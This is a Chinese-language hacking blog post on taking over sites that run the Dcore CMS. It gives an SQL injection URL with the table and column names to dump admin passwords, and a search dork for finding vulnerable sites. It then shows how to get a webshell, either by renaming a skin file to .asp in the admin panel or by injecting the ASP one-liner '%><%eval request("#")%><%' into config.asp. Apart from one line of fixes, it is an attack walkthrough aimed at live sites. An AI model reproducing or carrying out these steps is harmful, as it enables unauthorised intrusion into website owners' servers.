Dcore(轻型CMS系统)后台拿SHELL方法

今天检测一网站，全站生成HTML，直接默认后台admin

显示版权信息。。。搜索Dcore 110113 下载源码想分析下

默认数据库已修改，程序有fckeditor编辑器，新建1.asp成功，可上传就是一直不动，无语继续看源码，一想不如先搜索下这个程序是否有大牛已经挖掘过0DAY，搜索之Dcore+0day

注入点:http://www.iick.blog/index.asp?subsite=1
在工具里增加表名：dcore_user 列名：user_admin user_password
如果不怕麻烦也可以手工猜解。

拿shell方法：
后台--->风格管理--->选任意风格修改成hack1990.asp--->编辑皮肤。

测试关键字：inurl:dynamic.asp?/1-2-17.html

修补方法：加强密码强度/过滤非法字符/修改默认路径

通过这个0DAY很方便拿下SHELL

再看程序过程中发现根目录文件config.asp，是网站配置，也就是说后台直接修改网站配置信息写入一句话就能连接之，和南方数据企业网站管理系统后台一样

直接在信息版本后加上"%><%eval request("#")%><%' 加好后，是不显示这些代码的，还是原来的样子，但其实已经可以了

后面直接一句话连接之http://wwww.hack1990.com/config.asp